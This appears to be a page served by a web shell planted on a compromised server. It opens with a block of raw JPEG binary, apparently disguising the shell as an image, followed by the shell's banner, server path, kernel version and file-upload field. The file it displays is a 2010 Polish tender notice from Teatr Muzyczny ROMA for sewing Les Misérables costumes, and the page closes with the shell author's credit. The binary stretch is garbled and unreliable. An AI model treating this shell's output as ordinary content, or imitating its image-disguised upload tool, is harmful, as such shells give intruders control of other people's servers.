JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/114001-N-2010.html

<p class="kh_header"><b>Warszawa: USŁUGA SZYCIA ARTYSTYCZNEGO STYLOWYCH KOSTIUMÓW TEATRALNYCH DO MUSICALU PT. LES MISERABLES ZGODNIE Z PROJEKTAMI KOSTIUMOGRAFÓW MAGDALENY TESŁAWSKIEJ I PAWŁA GRABARCZYKA</b><br>
<b>Numer ogłoszenia: 114001 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA SZYCIA ARTYSTYCZNEGO STYLOWYCH KOSTIUMÓW TEATRALNYCH DO MUSICALU PT. LES MISERABLES ZGODNIE Z PROJEKTAMI KOSTIUMOGRAFÓW MAGDALENY TESŁAWSKIEJ I PAWŁA GRABARCZYKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na artystycznym uszyciu stylowych  kostiumów do nowego musicalu pt. Les Miserables, na podstawie przekazanych projektów kostiumów oraz pod ścisłym nadzorem kostiumografów. Niezbędna jest znajomość kroju historycznego i umiejętność zastosowania go w praktyce.

Zgodnie z koncepcja kostiumografów zaakceptowaną przez reżysera oraz scenografa, który jest odpowiedzialny za wygląd plastyczny spektaklu zostały przedstawione projekty kostiumów do musicalu pt. Les Miserables. Kostiumy muszą zostać skrojone według kroju historycznego - wiek XIX z lat 1815 - 1832, a następnie uszyte zgodnie z wiedzą i umiejętnościami krawców teatralnych. Kostiumy muszą zostać uszyte zgodnie z projektami kostiumografów. Projekty stanowią załącznik nr 8 do SIWZ. Każda decyzja dotycząca kostiumu musi zostać wcześniej uzgodniona z projektantem (dobór guzików, dobór podszewki, szerokość kołnierzyka, szerokość mankietów, wysokość i szerokość ewentualnych kieszeni itp.) Kostiumy muszą zostać tak wykonane aby stanowiły element dzieła jakim będzie przedstawienie pt. Les Miserables. Kostiumy maja być wykonane na odpowiedniego aktora wskazanego przez reżysera, wykonanie to wiąże się z miarami mającymi na celu odpowiednie dopasowanie kostiumów oraz ustalenia szczegółów z kostiumografami, dlatego każda miara aktorów musi się odbywać w obecności projektantów, co również wiąże się z poprawianiem jednego kostiumu kilka razy aż do uzyskania żądanego efektu wymaganego przez kostiumografów. Kostiumy będą uszyte z wcześniej preparowanych malarsko tkanin i dopiero potem dobrane do każdego aktora jak również do każdego projektu. Tkaniny które będą używane do uszycia kostiumów to głównie tkaniny lniane, wełniane, jedwabne oraz bawełniane. Przed przystąpieniem do realizacji usługi każdy kostium zostanie dokładnie omówiony z kostiumografami z dokładnym określeniem tkanin do danego projektu. Kostiumy zostaną uszyte z powierzonego materiału, który należy rozliczyć poprzez wypełnienie kart kalkulacyjnych. W scenach zespołowych kostiumy różnią się od siebie, kolorem tkaniny, fakturą na tkaninie, długością spodni, spódnic, wykończeniem elementu kostiumu. Dla każdego aktora biorącego udział w scenie zespołowej zostanie dokładnie określona dla niego forma kostiumu przez kostiumografa na podstawie podstawowego projektu. 

Zamawiający jest uprawniony do zamówienia mniejszej ilości usług niż wyszczególnione w opisie przedmiotu zamówienia, przy jednoczesnym zachowaniu cen jednostkowych z oferty Wykonawcy.

Zamówienie składa się z dwóch Zadań (części).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających w wysokości do 20% wartości zamówienia podstawowego. Zamówienie uzupełniające zostanie udzielone w przypadku zmiany w obsadzie dokonanej przez reżysera spektaklu lub spowodowanej czynnikami niemożliwymi do przewidzenia np. rezygnacją artysty. Podczas prób reżyserskich na scenie może się okazać iż w danej scenie np. Gospodarstwo jest zbyt mała ilość osób. Reżyser, w ramach swobody twórczej, może doangażować do konkretnej sceny kolejne osoby. Zwiększenie lub zmiana obsady może wiązać się z koniecznością doszycia nowych kompletów kostiumów</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.31.20.00-1, 98.39.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:

a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b) posiadania wiedzy i doświadczenia;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do
wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej.

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. Wykonawcy składają oświadczenia wyłącznie w formie oryginału.

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali lub realizują co najmniej dwa kontrakty na kwotę łączną nie mniejszą niż 140 000 zł brutto obejmujące wykonanie kostiumów teatralnych.

Ww. warunki udziału w postępowaniu dotyczą obu Zadań i są takie same dla Zadania nr 1 oraz Zadania nr 2.
Wykonawca składający ofertę na więcej niż jedną część zamówienia jest uprawniony przedstawić jeden wykaz wraz z dokumentami potwierdzającymi należyte wykonanie wymienionych w wykazie kontraktów


4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w pkt. III.3 Ogłoszenia oraz brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w pkt. III.4.2 Ogłoszenia.

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz: 

- wykażą, iż dysponują co najmniej 5 osobami z co najmniej 3 letnim doświadczeniem w szyciu kostiumów teatralnych.

Ww. warunki udziału w postępowaniu dotyczą obu Zadań i są takie same dla Zadania nr 1 oraz Zadania nr 2.
Wykonawca składający ofertę na więcej niż jedną część zamówienia jest uprawniony przedstawić jeden wykaz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ul. Nowogrodzka 49, 00-695 Warszawa - Sekretariat Teatru Muzycznego ROMA w Warszawie. Sekretariat pracuje od poniedziałku do piątku w godzinach 9:00-17:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 10:00, miejsce: Ul. Nowogrodzka 49, 00-695 Warszawa - Sekretariat Teatru Muzycznego ROMA w Warszawie. Sekretariat pracuje od poniedziałku do piątku w godzinach 9:00-17:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USŁUGA SZYCIA ARTYSTYCZNEGO STYLOWYCH KOSTIUMÓW TEATRALNYCH DO MUSICALU LES MISERABLES ZGODNIE Z PROJEKTAMI KOSTIUMOGRAFÓW MAGDALENY TESŁAWSKIEJ I PAWŁA GRABARCZYKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 
Przedmiot zamówienia jest artystyczne uszycie następujących kostiumów scenicznych:

1)	14 kostiumów galerników -  koszula, nadgarstniki, spodnie, resztki bluz - łachmany -tkaniny preparowane malarsko - scena Kamieniołomy - scena zespołowa,
2)	2 kostiumy dla Valjana - spodnie trzy-czwarte, bezrękawnik z wysokim kołnierzem - scena Kamieniołomy, 
3)	2 kostiumy typu kurtka z kieszeniami dla Valjana, która powinna być wykonana za duża - scena U biskupa,
4)	11 kostiumów damskich dla gości w scenie Wesele - halka, suknia jako baza, na wierzchu tkanina typu organza jedwabna układana metodą origami - tkanina syntetyczna - baza, wierzch z tkaniny jedwabnej - scena zespołowa,
5)	2 kostiumy dla Valjana do sceny Ulice Paryża - surdut, kamizelka, koszule, spodnie, fular,
6)	2 kostiumy dla Valjana do sceny dziejącej się w fabryce - surdut, koszula, kamizelka, spodnie,
7)	6 kostiumów dla dziewczynek grających postać małej Eponiny - sukieneczki z falbankami, majteczki, spodenki z falbanką,
8)	2 kostiumy dla Javerta  - bluza, spodnie, płaszcz z pelerynką, 
9)	 2 kostiumy dla Javerta - płaszcze,
10)	 2 kostiumy dla Javerta na barykadę - spodnie, koszula, kamizelka, fular,
11)	 2 kostiumy dla Valjana do sceny Umowy - płaszcz,  
12)	 2 kostiumy dla Mariusza - surdut, koszula, kamizelka, spodnie, fular, 
13)	 2 kostiumy dla Enjolras - surdut, kamizelka, spodnie, koszula, surdut,
14)	 4 kostium dla żony Karczmarza - suknia, fartuch,
15)	 6 kostiumów dla Gavroche(dzieci) - spodnie, koszula, kamizelka,
16)	9 kostiumów do sceny Gospodarstwa, damskich - spódnica, bluzka, gorsecik, fartuch - scena zbiorowa,
17)	6 kostiumów dla dziewczynki grającej postać małej Cosetty w scenie Gospoda.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.31.20.00-1, 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USŁUGA SZYCIA ARTYSTYCZNEGO STYLOWYCH KOSTIUMÓW TEATRALNYCH DO MUSICALU LES MISERABLES ZGODNIE Z PROJEKTAMI KOSTIUMOGRAFÓW MAGDALENY TESŁAWSKIEJ I PAWŁA GRABARCZYKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2
Przedmiot zamówienia jest artystyczne uszycie następujących kostiumów scenicznych:

1)	4 kostiumów zarządcy robotnikami - bluzy, spodnie,
2)	4 kostiumów pracownika gospodarstwa - koszula, spodnie, kamizelka, 
3)	4 kostiumów dla karczmarza - koszula, spodnie, fartuch, kamizelka,
4)	13 kostiumów dla rolników w tym 6 dzieci - koszule szerokie, spodnie, kamizelki, fartuch, chusty pod szyją - scena zespołowa,
5)	4 kostiumy dla biskupa -  sutanna,
6)	4 kostiumy dla biskupa - koszula nocna,
7)	4 kostiumy dla gospodyni biskupa - suknia z chustą,
8)	4 kostiumy dla gospodyni biskupa - koszule nocne,
9)	13 kostiumów męskich - pracownicy fabryki - koszula, spodnie, kamizelki, fartuchy, bluzy - scena zespołowa,
10)	11 kostiumów damskich dla pracowników fabryki - suknie, spódnice, bluzki, fartuchy, chusty - scena zespołowa, 
11)	 4 kostiumy dla majstra w fabryce - spodnie koszula, kamizelka, surdut, fular,
12)	 6 kostiumów dla marynarzy -  koszula spodnie, kołnierzyk, kurtki, chustki - scena zespołowa,
13)	 7 kostiumów dla klientów - surduty, kamizelki, koszule, spodnie, fulary - scena zespołowa,
14)	 4 kostiumy dla alfonsa (pimp) - koszule, spodnie, kamizelka, fulary,
15)	 4 kostiumy dla Bamatabois - koszula, spodnie, kamizelka, surdut, fular,
16)	 13 kostiumów damskich przechodnie w scenie Wypadek z wozem - chusty, bluzy, płaszcze, kurtki, suknie, kamizelki, koszule, spódnice - scena zespołowa,
17)	 15 kostiumów męskich przechodnie w scenie Wypadek z wozem - bluzy, koszule, kamizele, spodnie, płaszcze, kurtki - scena zespołowa,
18)	 4 kostiumy dla sędziego  - dokładne przeniesienie ubioru Sędziego z lat 1832 - toga, spodnie, koszula, chusta pod szyją,
19)	 5 kostiumów dla asystentów sędziego - dokładne przeniesienie ubiorów z lat 1832 - koszula, spodnie, chusta, toga,
20)	 4 kostiumy dla pielęgniarki(zakonnica) - sutanna, fartuch,
21)	 11 kostiumów damskich do sceny Gospoda - suknie, bluzki, spódnice, chusty, peleryny, płaszcze - scena zespołowa,
22)	15 kostiumów męskich do sceny :Gospoda - koszule, płaszcze, peleryny, kamizelki, surduty, kurtki - scena zespołowa,
23)	 39 kostiumów  do sceny Ulice Paryża w tym 24 damskie i 15 męskich - łachmany, suknie, spódnice, bluzki, kamizelki, chusty, spódnice, surduty, spodnie, kamizelki, koszule, fulary - scena zespołowa,
24)	 7 kostiumów dla gangu Thienardiera - spodnie, kurtki, koszule, kamizelki, fulary - scena zespołowa,
25)	 2 kostiumy dla Eponiny - bluzka, spódnica, pasek, płaszcz,
26)	 10 kostiumów dla studentów - surdut, kamizelka, koszula, fular, spodnie - scena zespołowa,
27)	 4 kostiumy dla kelnerki - suknia, fartuszek,
28)	 4 kostiumy dla barmana - spodnie koszula, kamizelka, fartuch,
29)	 25 fraków - czarna góra, ecru spodnie, kamizelki białe, krawaty,
30)	 2 kostiumy dla Eponiny  - duch - patrz punkt 25,
31)	 10 kostiumów dla studentów - duchy - patrz punkt 26,
32)	 2 kostiumy dla Fantine - duch - suknia,
33)	 2 kostiumy dla Valjana - mundur gwardzisty,
34)	11 kostiumów dla prostytutek - gorsety, spódnica, rękawy, bluzki, chusty - scena zespołowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.31.20.00-1, 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com